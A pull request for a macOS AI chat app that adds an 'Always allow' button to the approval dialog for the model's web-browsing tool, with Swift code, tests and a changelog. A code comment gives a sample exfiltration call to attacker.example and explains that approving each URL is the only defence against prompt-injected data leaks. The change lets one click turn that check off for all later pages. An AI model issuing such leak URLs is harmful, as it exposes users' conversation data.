### PR TITLE
Add always-allow browsing approval

### DIFF
--- a/apps/rapid-mac/CHANGELOG.md
+++ b/apps/rapid-mac/CHANGELOG.md
@@ -13,6 +13,13 @@ can actually understand.
 
 ## [Unreleased]
 
+### Added
+
+- **Web-page approvals now include “Always allow.”** Choose it once to let the
+  model read future public web pages without interrupting you for every URL.
+  Private and local addresses remain blocked, and the permission can be turned
+  off again in Settings → Tools.
+
 ### Fixed
 
 - **"Speed on this Mac" actually measures something.** It was posting to the

--- a/apps/rapid-mac/Sources/Rapid/Tools/BrowseApprovalStore.swift
+++ b/apps/rapid-mac/Sources/Rapid/Tools/BrowseApprovalStore.swift
@@ -7,11 +7,10 @@ import Observation
 /// `browse("https://attacker.example/?leak=<secrets>")` would exfiltrate
 /// conversation data to a public host that no SSRF check can block (the host
 /// *is* public). The only real defence is that the user SEES and approves the
-/// exact URL before any request runs. Mirrors ChatGPT's "Allow once / Don't
-/// allow": there is no per-URL "always allow" (URLs vary every call); a
-/// prominent Settings switch (**Auto-approve all browsing**) turns the gate off
-/// for unattended use. Default is ``Mode/ask``; only that coarse mode is
-/// persisted.
+/// exact URL before any request runs. The prompt offers "Allow once" or
+/// "Always allow"; the latter enables the same persisted, coarse browsing mode
+/// exposed in Settings. Private and local destinations remain blocked by the
+/// SSRF guard in either mode. Default is ``Mode/ask``.
 @MainActor
 @Observable
 final class BrowseApprovalStore {
@@ -110,6 +109,15 @@ final class BrowseApprovalStore {
         pendingRequest = nil
         pendingContinuation?.resume(returning: decision)
         pendingContinuation = nil
+    }
+
+    /// Approve the pending fetch and remember that future public web fetches
+    /// should not prompt. This deliberately reuses ``mode`` rather than keeping
+    /// a second preference that could drift from the Settings toggle.
+    func alwaysAllow() {
+        guard pendingRequest != nil else { return }
+        mode = .autoApproveAll
+        answer(.allowOnce)
     }
 
     /// Collapse a URL to a single capped line for the dialog body. Explicit

--- a/apps/rapid-mac/Sources/Rapid/UI/ContentView.swift
+++ b/apps/rapid-mac/Sources/Rapid/UI/ContentView.swift
@@ -860,9 +860,9 @@ struct ContentView: View {
 
 /// Approval dialog for the ``browse`` tool: present while a request is
 /// pending, deny on external dismiss (Esc / click-outside) so a suspended
-/// tool can never hang waiting on a sheet the user has closed. There is no
-/// per-URL "always allow" — URLs vary each call; unattended users flip
-/// **Auto-approve browsing** in Settings → Tools.
+/// tool can never hang waiting on a sheet the user has closed. "Always allow"
+/// enables the persisted public-web auto-approval mode that can be turned off
+/// again in Settings → Tools.
 private struct BrowseApprovalDialog: ViewModifier {
     let store: BrowseApprovalStore
 
@@ -918,11 +918,17 @@ private struct BrowseApprovalSheet: View {
                 .font(.caption)
                 .foregroundStyle(.secondary)
 
+            Text("Always allow applies to all future public web pages. You can turn it off in Settings → Tools.")
+                .font(.caption)
+                .foregroundStyle(.secondary)
+
             HStack {
                 Spacer()
                 Button("Don't allow") { store.answer(.deny) }
                     .keyboardShortcut(.cancelAction)
                     .accessibilityIdentifier("ToolApproval.Browse.Deny")
+                Button("Always allow") { store.alwaysAllow() }
+                    .accessibilityIdentifier("ToolApproval.Browse.AlwaysAllow")
                 Button("Allow once") { store.answer(.allowOnce) }
                     .keyboardShortcut(.defaultAction)
                     .accessibilityIdentifier("ToolApproval.Browse.Allow")
@@ -934,7 +940,7 @@ private struct BrowseApprovalSheet: View {
         // An accessibility modifier on a container that is not its own
         // accessibility element is applied to the elements it contains, so a
         // wrapper identifier can be stamped onto the descendants and make the
-        // name ambiguous — including over the two buttons a flow actually
+        // name ambiguous — including over the three buttons a flow actually
         // needs to press. "The approval is up" is better asserted by waiting
         // for `ToolApproval.Browse.Allow`, which is the control the user acts
         // on rather than a wrapper around it.

--- a/apps/rapid-mac/Tests/RapidTests/AccessibilityIdentifierInventoryTests.swift
+++ b/apps/rapid-mac/Tests/RapidTests/AccessibilityIdentifierInventoryTests.swift
@@ -275,7 +275,7 @@ struct AccessibilityIdentifierInventoryTests {
     /// is a real SwiftUI `.sheet`, so — unlike a `confirmationDialog` — its
     /// buttons are ordinary SwiftUI buttons and carry identifiers directly.
     ///
-    /// The two *answers* are named; the enclosing stack deliberately is not.
+    /// The three *answers* are named; the enclosing stack deliberately is not.
     /// An accessibility modifier on a container that is not its own
     /// accessibility element applies to the elements it contains, so naming
     /// the wrapper risks stamping that name across its descendants — including
@@ -286,6 +286,7 @@ struct AccessibilityIdentifierInventoryTests {
         try assertDeclared(
             [
                 #""ToolApproval.Browse.Allow""#,
+                #""ToolApproval.Browse.AlwaysAllow""#,
                 #""ToolApproval.Browse.Deny""#,
             ],
             in: "Sources/Rapid/UI/ContentView.swift",

--- a/apps/rapid-mac/Tests/RapidTests/DeclinedToolDiagnosisTests.swift
+++ b/apps/rapid-mac/Tests/RapidTests/DeclinedToolDiagnosisTests.swift
@@ -135,6 +135,32 @@ final class DeclinedToolDiagnosisTests {
         #expect(decision == .allowOnce)
     }
 
+    @Test("Always allow approves the pending fetch and persists auto-approval")
+    func alwaysAllowPersistsAndSkipsFuturePrompts() async throws {
+        let defaults = freshDefaults()
+        let approval = BrowseApprovalStore(defaults: defaults)
+
+        async let pending = approval.requestApproval(
+            url: "https://example.com/article",
+            host: "example.com"
+        )
+        try await waitForPendingApproval(approval)
+        approval.alwaysAllow()
+
+        #expect(await pending == .allowOnce)
+        #expect(approval.pendingRequest == nil)
+        #expect(approval.mode == .autoApproveAll)
+
+        let restored = BrowseApprovalStore(defaults: defaults)
+        #expect(restored.mode == .autoApproveAll)
+        let next = await restored.requestApproval(
+            url: "https://other.example/page",
+            host: "other.example"
+        )
+        #expect(next == .allowOnce)
+        #expect(restored.pendingRequest == nil)
+    }
+
     // MARK: - Declining a cross-origin redirect
 
     @Test("Declining a redirect to another host is a user decline too")


### PR DESCRIPTION
## What changed

- Adds an **Always allow** action to the browse approval sheet.
- Reuses the existing persisted “Approve every page automatically” setting, so users can revoke it in Settings → Tools.
- Keeps scheme and SSRF protections unchanged: private and local addresses remain blocked.
- Adds persistence, continuation, and accessibility identifier coverage.

## Why

Approving every individual page interrupts normal research flows even when the user has already decided to trust public-web browsing. The capability existed in Settings, but the approval dialog did not expose it.

## Validation

- `swift build`
- `swift build --target RapidTests`
- accessibility identifier PR gate
- release `.app` build with bundled sidecar
- `codex review --uncommitted`: no findings
- Full `swift test` is blocked locally because this machine only has Command Line Tools and the separate `RapidUXTests` target cannot import XCTest; CI will run the complete suite.
